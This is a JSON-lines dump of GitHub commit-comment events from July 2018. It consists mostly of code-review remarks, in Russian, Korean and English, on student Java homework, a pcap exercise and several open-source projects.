{"id":"8034306578","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875452,"position":77,"line":104,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T17:06:05Z","updated_at":"2018-07-29T17:06:05Z","author_association":"OWNER","body":"Class specialization for not vector is below. This one is only for vector"}},"created_at":"2018-07-29T17:06:05Z"}
{"id":"8034307271","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaShop2"},"payload":{"comment":{"id":29875456,"position":null,"line":null,"path":null,"commit_id":"d89e73eae03047357ec2f308d21bcc56e86556dc","created_at":"2018-07-29T17:06:33Z","updated_at":"2018-07-29T17:06:33Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaShop2/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `bd57521a-9351-11e8-96e7-009304f158b7`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T17:06:33Z"}
{"id":"8034307603","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework7"},"payload":{"comment":{"id":29875457,"position":8,"line":8,"path":"src/com/itacademy/zakharenkov/task/Quadrate.java","commit_id":"65e89567e5daee01d10e51db5c0224435864fbb9","created_at":"2018-07-29T17:06:47Z","updated_at":"2018-07-29T17:06:47Z","author_association":"NONE","body":"зачем так много данных для инициализации квадрта? Разве не достаточно было две точки передавать?"}},"created_at":"2018-07-29T17:06:47Z"}
{"id":"8034307841","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":29875459,"position":6,"line":1320,"path":"managers/cheat_manager.c","commit_id":"7131b969d887fc61d510b28eeb273486cdedf210","created_at":"2018-07-29T17:06:58Z","updated_at":"2018-07-29T17:06:58Z","author_association":"MEMBER","body":"target_match_idx is unsigned int so it can never become lower than 0 anyway."}},"created_at":"2018-07-29T17:06:58Z"}
{"id":"8034308992","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework7"},"payload":{"comment":{"id":29875462,"position":8,"line":8,"path":"src/com/itacademy/zakharenkov/task/Ring.java","commit_id":"65e89567e5daee01d10e51db5c0224435864fbb9","created_at":"2018-07-29T17:07:47Z","updated_at":"2018-07-29T17:07:47Z","author_association":"NONE","body":"лучше private и через get доступ получать из наследников"}},"created_at":"2018-07-29T17:07:47Z"}
{"id":"8034309560","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework7"},"payload":{"comment":{"id":29875464,"position":6,"line":6,"path":"src/com/itacademy/zakharenkov/task/ShapeUtils.java","commit_id":"65e89567e5daee01d10e51db5c0224435864fbb9","created_at":"2018-07-29T17:08:10Z","updated_at":"2018-07-29T17:08:10Z","author_association":"NONE","body":"утилитный класс final и private конструктор"}},"created_at":"2018-07-29T17:08:10Z"}
{"id":"8034311175","type":"CommitCommentEvent","actor":{"login":"aar026"},"repo":{"name":"aar026/aar026.github.io"},"payload":{"comment":{"id":29875469,"position":null,"line":null,"path":null,"commit_id":"9c3887dd0778b6a73af1dc8e7880d2ac19661db2","created_at":"2018-07-29T17:09:16Z","updated_at":"2018-07-29T17:09:16Z","author_association":"OWNER","body":"changed anchor for oilgo\r\n"}},"created_at":"2018-07-29T17:09:16Z"}
{"id":"8034311418","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework9"},"payload":{"comment":{"id":29875470,"position":3,"line":3,"path":"src/com/itacademy/zakharenkov/task1/CollectionUtils.java","commit_id":"a80fdd681fd65ab985f7736af08b2aef359f99d3","created_at":"2018-07-29T17:09:27Z","updated_at":"2018-07-29T17:09:27Z","author_association":"NONE","body":"не использовать множественный импорт, не по код конвеншену. Исправить в настроках идеи, я показывал как"}},"created_at":"2018-07-29T17:09:27Z"}
{"id":"8034311818","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework9"},"payload":{"comment":{"id":29875474,"position":15,"line":15,"path":"src/com/itacademy/zakharenkov/task1/CollectionUtils.java","commit_id":"a80fdd681fd65ab985f7736af08b2aef359f99d3","created_at":"2018-07-29T17:09:44Z","updated_at":"2018-07-29T17:09:44Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T17:09:44Z"}
{"id":"8034312755","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework9"},"payload":{"comment":{"id":29875479,"position":11,"line":11,"path":"src/com/itacademy/zakharenkov/task1/CollectionUtils.java","commit_id":"a80fdd681fd65ab985f7736af08b2aef359f99d3","created_at":"2018-07-29T17:10:25Z","updated_at":"2018-07-29T17:10:25Z","author_association":"NONE","body":"зачем делать копирование в данном случае? Расточительно по памяти"}},"created_at":"2018-07-29T17:10:25Z"}
{"id":"8034313614","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework9"},"payload":{"comment":{"id":29875482,"position":15,"line":15,"path":"src/com/itacademy/zakharenkov/task1/CollectionUtils.java","commit_id":"a80fdd681fd65ab985f7736af08b2aef359f99d3","created_at":"2018-07-29T17:10:58Z","updated_at":"2018-07-29T17:10:58Z","author_association":"NONE","body":"можно было проще реализовать, не надо никаких counter"}},"created_at":"2018-07-29T17:10:58Z"}
{"id":"8034314037","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29875486,"position":98,"line":126,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T17:11:16Z","updated_at":"2018-07-29T17:11:16Z","author_association":"OWNER","body":"In terms of complexity but find-and-erase will most likely cause reallocation (if erasing not .end()-1). But ofc I'll change if you think so"}},"created_at":"2018-07-29T17:11:16Z"}
{"id":"8034314526","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework9"},"payload":{"comment":{"id":29875487,"position":32,"line":32,"path":"src/com/itacademy/zakharenkov/task1/CollectionUtils.java","commit_id":"a80fdd681fd65ab985f7736af08b2aef359f99d3","created_at":"2018-07-29T17:11:36Z","updated_at":"2018-07-29T17:11:36Z","author_association":"NONE","body":"данный метод никак не подходит твоему CollectionUtils, он вообще для создания тестовых данных"}},"created_at":"2018-07-29T17:11:36Z"}
{"id":"8034314856","type":"CommitCommentEvent","actor":{"login":"cceckman"},"repo":{"name":"cceckman/go-multierror"},"payload":{"comment":{"id":29875488,"position":null,"line":null,"path":null,"commit_id":"a6e52a8f6a65aab8315a1bfa9ce92ec697fe5ea0","created_at":"2018-07-29T17:11:50Z","updated_at":"2018-07-29T17:11:50Z","author_association":"OWNER","body":"Commit title is misleading-\r\n\r\nThis has the same behavior as Golang's `append`, which is that it isn't thread-safe to begin with; you need an external locking mechanism around the slice (or `Error`).\r\n\r\nIt's unfortunate that there isn't a safe way to do this with `multierror`, but that runs into `nil`-initialized-variable issues."}},"created_at":"2018-07-29T17:11:50Z"}
{"id":"8034315782","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29875493,"position":null,"line":null,"path":null,"commit_id":"a22797d356f5c47428a9b7c74ee9334a24101fa8","created_at":"2018-07-29T17:12:27Z","updated_at":"2018-07-29T17:12:27Z","author_association":"MEMBER","body":"Oh nice! Maybe we can use a regex or something to split off the version suffix in all cases."}},"created_at":"2018-07-29T17:12:27Z"}
{"id":"8034316516","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"RomanZakharenkov/homework9"},"payload":{"comment":{"id":29875495,"position":55,"line":55,"path":"src/com/itacademy/zakharenkov/task2/StudentUtils.java","commit_id":"a80fdd681fd65ab985f7736af08b2aef359f99d3","created_at":"2018-07-29T17:12:59Z","updated_at":"2018-07-29T17:12:59Z","author_association":"NONE","body":"лучше использовать list.sort"}},"created_at":"2018-07-29T17:12:59Z"}
{"id":"8034316810","type":"CommitCommentEvent","actor":{"login":"derek-adair"},"repo":{"name":"BurntSushi/nflgame"},"payload":{"comment":{"id":29875499,"position":null,"line":null,"path":null,"commit_id":"c9747ccb597d6c31f61e4002bc4bd9f45a05b064","created_at":"2018-07-29T17:13:09Z","updated_at":"2018-07-29T17:13:09Z","author_association":"NONE","body":"I'm somewhat commited to at least keeping this running for a fantasy football league I help run.  Let me know what I can do to help contribute.  I'm sure there are others that can as well.\r\n\r\nThanks for all your hard work @BurntSushi "}},"created_at":"2018-07-29T17:13:09Z"}
{"id":"8034318129","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson7"},"payload":{"comment":{"id":29875500,"position":3,"line":3,"path":"src/by/itacademy/lesson7/IOutputToDisplay.java","commit_id":"3448bf439bcb65d81dc316743f955398c7417897","created_at":"2018-07-29T17:14:03Z","updated_at":"2018-07-29T17:14:03Z","author_association":"NONE","body":"не надо называть интерфейсы с префикса I*, на самом деле это пережиток прошлого, так не следует делать"}},"created_at":"2018-07-29T17:14:03Z"}
{"id":"8034319695","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson7"},"payload":{"comment":{"id":29875511,"position":25,"line":25,"path":"src/by/itacademy/lesson7/ShapeUtils.java","commit_id":"3448bf439bcb65d81dc316743f955398c7417897","created_at":"2018-07-29T17:15:11Z","updated_at":"2018-07-29T17:15:11Z","author_association":"NONE","body":"как этот метод относится к фигурам, если принимает сообщение и список каких-то даблов? Сюда что угодно можно передать, некорректно выглядит"}},"created_at":"2018-07-29T17:15:11Z"}
{"id":"8034319906","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson7"},"payload":{"comment":{"id":29875514,"position":6,"line":6,"path":"src/by/itacademy/lesson7/circlegroup/Circle.java","commit_id":"3448bf439bcb65d81dc316743f955398c7417897","created_at":"2018-07-29T17:15:20Z","updated_at":"2018-07-29T17:15:20Z","author_association":"NONE","body":"отступ между классом и полями"}},"created_at":"2018-07-29T17:15:20Z"}
{"id":"8034321160","type":"CommitCommentEvent","actor":{"login":"dginovker"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29875518,"position":null,"line":null,"path":null,"commit_id":"d2186b3db61a9d4dc2d4a6211573790d9e34bf58","created_at":"2018-07-29T17:16:13Z","updated_at":"2018-07-29T17:16:13Z","author_association":"NONE","body":"> Those screenshots were taken 3 days ago. This PR was merged 6 days ago.\r\n\r\nOh I didn't mean to sound like this was a direct result of those screenshots. But these attacks on Cobra have been going on for much longer than 6 days."}},"created_at":"2018-07-29T17:16:13Z"}
{"id":"8034321603","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29875520,"position":10,"line":10,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T17:16:31Z","updated_at":"2018-07-29T17:16:31Z","author_association":"CONTRIBUTOR","body":"This is the second time recently I've seen this error, and I don't know why it happens. Is our documentation unclear?"}},"created_at":"2018-07-29T17:16:31Z"}
{"id":"8034321921","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson7"},"payload":{"comment":{"id":29875521,"position":61,"line":61,"path":"src/by/itacademy/lesson7/quadranglegroup/Parallelogram.java","commit_id":"3448bf439bcb65d81dc316743f955398c7417897","created_at":"2018-07-29T17:16:44Z","updated_at":"2018-07-29T17:16:44Z","author_association":"NONE","body":"зачем этот хардкод, выноси в статические константы класса, раз это одинаковое для все фигур одного и того же класса"}},"created_at":"2018-07-29T17:16:44Z"}
{"id":"8034322717","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson7"},"payload":{"comment":{"id":29875522,"position":56,"line":56,"path":"src/by/itacademy/lesson7/quadranglegroup/Parallelogram.java","commit_id":"3448bf439bcb65d81dc316743f955398c7417897","created_at":"2018-07-29T17:17:16Z","updated_at":"2018-07-29T17:17:16Z","author_association":"NONE","body":"не извращайся над toString, оставляй то, как генерит идея"}},"created_at":"2018-07-29T17:17:16Z"}
{"id":"8034323383","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"smakerdev/pcap_test"},"payload":{"comment":{"id":29875525,"position":8,"line":8,"path":"pcap.c","commit_id":"8debcc95b76e9b61c2752942158742b62468e98e","created_at":"2018-07-29T17:17:44Z","updated_at":"2018-07-29T17:17:44Z","author_association":"NONE","body":"type의 크기가 4? 2가 아니고?"}},"created_at":"2018-07-29T17:17:44Z"}
{"id":"8034323405","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson7"},"payload":{"comment":{"id":29875526,"position":16,"line":16,"path":"src/by/itacademy/lesson7/quadranglegroup/Rhombus.java","commit_id":"3448bf439bcb65d81dc316743f955398c7417897","created_at":"2018-07-29T17:17:45Z","updated_at":"2018-07-29T17:17:45Z","author_association":"NONE","body":"некорректно ты рассчитываешь периметр ромба"}},"created_at":"2018-07-29T17:17:45Z"}
{"id":"8034323758","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"smakerdev/pcap_test"},"payload":{"comment":{"id":29875527,"position":6,"line":6,"path":"pcap.c","commit_id":"8debcc95b76e9b61c2752942158742b62468e98e","created_at":"2018-07-29T17:18:00Z","updated_at":"2018-07-29T17:18:00Z","author_association":"NONE","body":"unsigned char > uint8_t"}},"created_at":"2018-07-29T17:18:00Z"}
{"id":"8034325118","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson9"},"payload":{"comment":{"id":29875531,"position":25,"line":25,"path":"src/taks1/Task1.java","commit_id":"bb068c5a83fb65407dea7cc38c72e0c56df3ac11","created_at":"2018-07-29T17:18:58Z","updated_at":"2018-07-29T17:18:58Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T17:18:58Z"}
{"id":"8034325276","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson9"},"payload":{"comment":{"id":29875532,"position":30,"line":30,"path":"src/taks1/Task1.java","commit_id":"bb068c5a83fb65407dea7cc38c72e0c56df3ac11","created_at":"2018-07-29T17:19:05Z","updated_at":"2018-07-29T17:19:05Z","author_association":"NONE","body":"\r\nв методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T17:19:05Z"}
{"id":"8034325956","type":"CommitCommentEvent","actor":{"login":"marzuki81"},"repo":{"name":"Upstake/ups-smart-contract"},"payload":{"comment":{"id":29875533,"position":5,"line":5,"path":"UpstakeToken.sol","commit_id":"076e99ee3edaf0b7b64787bad9b7479b4581c662","created_at":"2018-07-29T17:19:34Z","updated_at":"2018-07-29T17:19:34Z","author_association":"NONE","body":"0xCeb2500Ea09bc7301dfBe820A5D97c229ad5FB7a"}},"created_at":"2018-07-29T17:19:34Z"}
{"id":"8034326180","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson9"},"payload":{"comment":{"id":29875535,"position":11,"line":11,"path":"src/taks1/Task1.java","commit_id":"bb068c5a83fb65407dea7cc38c72e0c56df3ac11","created_at":"2018-07-29T17:19:44Z","updated_at":"2018-07-29T17:19:44Z","author_association":"NONE","body":"зачем тебе утилитный класс в данном случае, если можно просто taskString.addAll?"}},"created_at":"2018-07-29T17:19:44Z"}
{"id":"8034326406","type":"CommitCommentEvent","actor":{"login":"marzuki81"},"repo":{"name":"Upstake/ups-smart-contract"},"payload":{"comment":{"id":29875536,"position":1,"line":1,"path":"README.md","commit_id":"076e99ee3edaf0b7b64787bad9b7479b4581c662","created_at":"2018-07-29T17:19:56Z","updated_at":"2018-07-29T17:19:56Z","author_association":"NONE","body":"0xCeb2500Ea09bc7301dfBe820A5D97c229ad5FB7a"}},"created_at":"2018-07-29T17:19:56Z"}
{"id":"8034327399","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"smakerdev/pcap_test"},"payload":{"comment":{"id":29875543,"position":57,"line":57,"path":"pcap.c","commit_id":"8debcc95b76e9b61c2752942158742b62468e98e","created_at":"2018-07-29T17:20:37Z","updated_at":"2018-07-29T17:20:37Z","author_association":"NONE","body":"i 변수는 어디에 쓰이죠?"}},"created_at":"2018-07-29T17:20:37Z"}
{"id":"8034328822","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"smakerdev/pcap_test"},"payload":{"comment":{"id":29875551,"position":73,"line":73,"path":"pcap.c","commit_id":"8debcc95b76e9b61c2752942158742b62468e98e","created_at":"2018-07-29T17:21:38Z","updated_at":"2018-07-29T17:21:38Z","author_association":"NONE","body":"fp 변수는 어디에 쓰이죠?"}},"created_at":"2018-07-29T17:21:38Z"}
{"id":"8034328937","type":"CommitCommentEvent","actor":{"login":"marzuki81"},"repo":{"name":"Upstake/ups-smart-contract"},"payload":{"comment":{"id":29875552,"position":3,"line":3,"path":"token/IERC20.sol","commit_id":"076e99ee3edaf0b7b64787bad9b7479b4581c662","created_at":"2018-07-29T17:21:43Z","updated_at":"2018-07-29T17:21:43Z","author_association":"NONE","body":"0xCeb2500Ea09bc7301dfBe820A5D97c229ad5FB7a"}},"created_at":"2018-07-29T17:21:43Z"}
{"id":"8034329152","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"lkghost7/homeworklesson9"},"payload":{"comment":{"id":29875553,"position":54,"line":54,"path":"src/task2/School.java","commit_id":"bb068c5a83fb65407dea7cc38c72e0c56df3ac11","created_at":"2018-07-29T17:21:53Z","updated_at":"2018-07-29T17:21:53Z","author_association":"NONE","body":"метод с двумя обязанностями, и находит и вывод. Итератор использовать надо было только для нахождения, в остальном его использовать не нужно, я же рассказывал, когда его только действительно следует использовать"}},"created_at":"2018-07-29T17:21:53Z"}
{"id":"8034329319","type":"CommitCommentEvent","actor":{"login":"sannanansari"},"repo":{"name":"sannanansari/probe-scraper"},"payload":{"comment":{"id":29875554,"position":null,"line":null,"path":null,"commit_id":"dd26b344eef523c8a2cbfad5c15b4d132b917495","created_at":"2018-07-29T17:22:03Z","updated_at":"2018-07-29T17:22:03Z","author_association":"OWNER","body":"It hard for me because this is my first bug. I have make some changes. You can review it."}},"created_at":"2018-07-29T17:22:03Z"}
{"id":"8034329748","type":"CommitCommentEvent","actor":{"login":"Brainstormtropper"},"repo":{"name":"pythonjobs/jobs"},"payload":{"comment":{"id":29875555,"position":2,"line":2,"path":"jobtemplate.html","commit_id":"4bd32414ab2bfb12f1cdb07ed3afbc33a0a7c8a2","created_at":"2018-07-29T17:22:21Z","updated_at":"2018-07-29T17:22:21Z","author_association":"NONE","body":"Senior Python Developer"}},"created_at":"2018-07-29T17:22:21Z"}
{"id":"8034330465","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"smakerdev/pcap_test"},"payload":{"comment":{"id":29875556,"position":83,"line":83,"path":"pcap.c","commit_id":"8debcc95b76e9b61c2752942158742b62468e98e","created_at":"2018-07-29T17:22:51Z","updated_at":"2018-07-29T17:22:51Z","author_association":"NONE","body":"pcap_lookupdev 함수 쓰지 말라고 하였습니다."}},"created_at":"2018-07-29T17:22:51Z"}
{"id":"8034339456","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875595,"position":11,"line":11,"path":"src/com/itacademy/lesson7homeworkpolymorphism/Polygon.java","commit_id":"cc0de9e220d3236428f798917428f6b9b586ba54","created_at":"2018-07-29T17:29:27Z","updated_at":"2018-07-29T17:29:27Z","author_association":"NONE","body":"тип фигуры и так определяется по тому, что за класс ты инстанцируешь"}},"created_at":"2018-07-29T17:29:27Z"}
{"id":"8034339598","type":"CommitCommentEvent","actor":{"login":"OpenUAS"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":29875596,"position":181,"line":490,"path":"sw/airborne/subsystems/ins/ins_int.c","commit_id":"b9d3ea4ac37427ab61c7acc397ca95beaceccdc7","created_at":"2018-07-29T17:29:33Z","updated_at":"2018-07-29T17:29:33Z","author_association":"CONTRIBUTOR","body":"COMMAND_THRUST rotorcraft only"}},"created_at":"2018-07-29T17:29:33Z"}
{"id":"8034339619","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29875597,"position":null,"line":null,"path":null,"commit_id":"d4f24139fa19c874881af67308722ed71533bb74","created_at":"2018-07-29T17:29:34Z","updated_at":"2018-07-29T17:29:34Z","author_association":"MEMBER","body":"> why did you leave NOCR out of this patch?\r\n\r\nBecause of this comment about ENC. Feel free to submit a pull request with this enhancement if you wish"}},"created_at":"2018-07-29T17:29:34Z"}
{"id":"8034340028","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875598,"position":33,"line":33,"path":"src/com/itacademy/lesson7homeworkpolymorphism/Polygon.java","commit_id":"cc0de9e220d3236428f798917428f6b9b586ba54","created_at":"2018-07-29T17:29:54Z","updated_at":"2018-07-29T17:29:54Z","author_association":"NONE","body":"не извращайся над toString, посмотри как идея генерит его и также пиши"}},"created_at":"2018-07-29T17:29:54Z"}
{"id":"8034340101","type":"CommitCommentEvent","actor":{"login":"drew-sinha"},"repo":{"name":"zplab/elegant"},"payload":{"comment":{"id":29875599,"position":108,"line":589,"path":"elegant/worm_data.py","commit_id":"2764dc3563ba3616eea8ccf5b9c38a3a625bb75c","created_at":"2018-07-29T17:29:57Z","updated_at":"2018-07-29T17:29:57Z","author_association":"NONE","body":"I would mention for clarity that these two filters are causal."}},"created_at":"2018-07-29T17:29:57Z"}
{"id":"8034340587","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875603,"position":8,"line":8,"path":"src/com/itacademy/lesson7homeworkpolymorphism/Rectangle.java","commit_id":"cc0de9e220d3236428f798917428f6b9b586ba54","created_at":"2018-07-29T17:30:17Z","updated_at":"2018-07-29T17:30:17Z","author_association":"NONE","body":"лучше private и get методы  к ним использовать"}},"created_at":"2018-07-29T17:30:17Z"}
{"id":"8034340932","type":"CommitCommentEvent","actor":{"login":"LearningSICP"},"repo":{"name":"LearningSICP/zmirror"},"payload":{"comment":{"id":29875613,"position":null,"line":null,"path":null,"commit_id":"b961c256c1c9ac672cd870d508e3efd9a100f294","created_at":"2018-07-29T17:30:31Z","updated_at":"2018-07-29T17:30:31Z","author_association":"OWNER","body":"加入了vimeo.com"}},"created_at":"2018-07-29T17:30:31Z"}
{"id":"8034341077","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875614,"position":3,"line":3,"path":"src/com/itacademy/lesson7homeworkpolymorphism/ShapeUtils.java","commit_id":"cc0de9e220d3236428f798917428f6b9b586ba54","created_at":"2018-07-29T17:30:37Z","updated_at":"2018-07-29T17:30:37Z","author_association":"NONE","body":"\r\nутилитный класс final и private конструктор"}},"created_at":"2018-07-29T17:30:37Z"}
{"id":"8034341607","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875615,"position":8,"line":8,"path":"src/com/itacademy/lesson7homeworkpolymorphism/ShapeUtils.java","commit_id":"cc0de9e220d3236428f798917428f6b9b586ba54","created_at":"2018-07-29T17:30:59Z","updated_at":"2018-07-29T17:30:59Z","author_association":"NONE","body":"мы ведь прошли енамы, почему ты ерундой страдаешь с типом фигуры в виде int?\r\n"}},"created_at":"2018-07-29T17:30:59Z"}
{"id":"8034342244","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875616,"position":5,"line":5,"path":"src/com/itacademy/lesson7homeworkpolymorphism/ShapeUtils.java","commit_id":"cc0de9e220d3236428f798917428f6b9b586ba54","created_at":"2018-07-29T17:31:25Z","updated_at":"2018-07-29T17:31:25Z","author_association":"NONE","body":"зачем утилитному классу protected метод!!"}},"created_at":"2018-07-29T17:31:25Z"}
{"id":"8034342368","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875617,"position":22,"line":22,"path":"src/com/itacademy/lesson7homeworkpolymorphism/ShapeUtils.java","commit_id":"cc0de9e220d3236428f798917428f6b9b586ba54","created_at":"2018-07-29T17:31:31Z","updated_at":"2018-07-29T17:31:31Z","author_association":"NONE","body":"public"}},"created_at":"2018-07-29T17:31:31Z"}
{"id":"8034342822","type":"CommitCommentEvent","actor":{"login":"drew-sinha"},"repo":{"name":"zplab/elegant"},"payload":{"comment":{"id":29875618,"position":null,"line":null,"path":null,"commit_id":"2764dc3563ba3616eea8ccf5b9c38a3a625bb75c","created_at":"2018-07-29T17:31:48Z","updated_at":"2018-07-29T17:31:48Z","author_association":"NONE","body":"Looks good - a couple suggestions about more explicit commenting."}},"created_at":"2018-07-29T17:31:48Z"}
{"id":"8034342851","type":"CommitCommentEvent","actor":{"login":"aar026"},"repo":{"name":"aar026/aar026.github.io"},"payload":{"comment":{"id":29875619,"position":null,"line":null,"path":null,"commit_id":"58ffd9e3556c6bf01d02fe377484ff6feb3f0931","created_at":"2018-07-29T17:31:50Z","updated_at":"2018-07-29T17:31:50Z","author_association":"OWNER","body":"this should work"}},"created_at":"2018-07-29T17:31:50Z"}
{"id":"8034343665","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875621,"position":43,"line":43,"path":"src/com/itacademy/lesson7homeworkpolymorphism/ShapeUtils.java","commit_id":"cc0de9e220d3236428f798917428f6b9b586ba54","created_at":"2018-07-29T17:32:20Z","updated_at":"2018-07-29T17:32:20Z","author_association":"NONE","body":"метод должен был возвращать true false, а не выводить на консоль, на консоль выводим только для тестов!"}},"created_at":"2018-07-29T17:32:20Z"}
{"id":"8034344753","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875623,"position":52,"line":52,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T17:33:05Z","updated_at":"2018-07-29T17:33:05Z","author_association":"NONE","body":"в задании: \"Возвращать предыдущую станцию, текущую, следующую, на основе маршрута\"\r\nлучше сделать отдельные методы для для возврата (не для вывода в консоль!) текущей / предыдущей / следующей станции"}},"created_at":"2018-07-29T17:33:05Z"}
{"id":"8034345346","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875625,"position":30,"line":30,"path":"src/com/itacademy/lesson9homeworkcollections/LerningCollections.java","commit_id":"5842a0fa0d54508fdacc481480a1289dfd477aad","created_at":"2018-07-29T17:33:28Z","updated_at":"2018-07-29T17:33:28Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T17:33:28Z"}
{"id":"8034345529","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29875626,"position":38,"line":38,"path":"src/com/itacademy/lesson9homeworkcollections/LerningCollections.java","commit_id":"5842a0fa0d54508fdacc481480a1289dfd477aad","created_at":"2018-07-29T17:33:35Z","updated_at":"2018-07-29T17:33:35Z","author_association":"NONE","body":"в методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T17:33:35Z"}
{"id":"8034345626","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29875627,"position":55,"line":55,"path":"Lesson3/train.rb","commit_id":"b3b50dedcec4e9e11b9f259dd3b223a24b08a6ab","created_at":"2018-07-29T17:33:38Z","updated_at":"2018-07-29T17:33:38Z","author_association":"NONE","body":"ну нужно оставлять пустые строки между окончанием метода и концом класса\r\n"}},"created_at":"2018-07-29T17:33:38Z"}
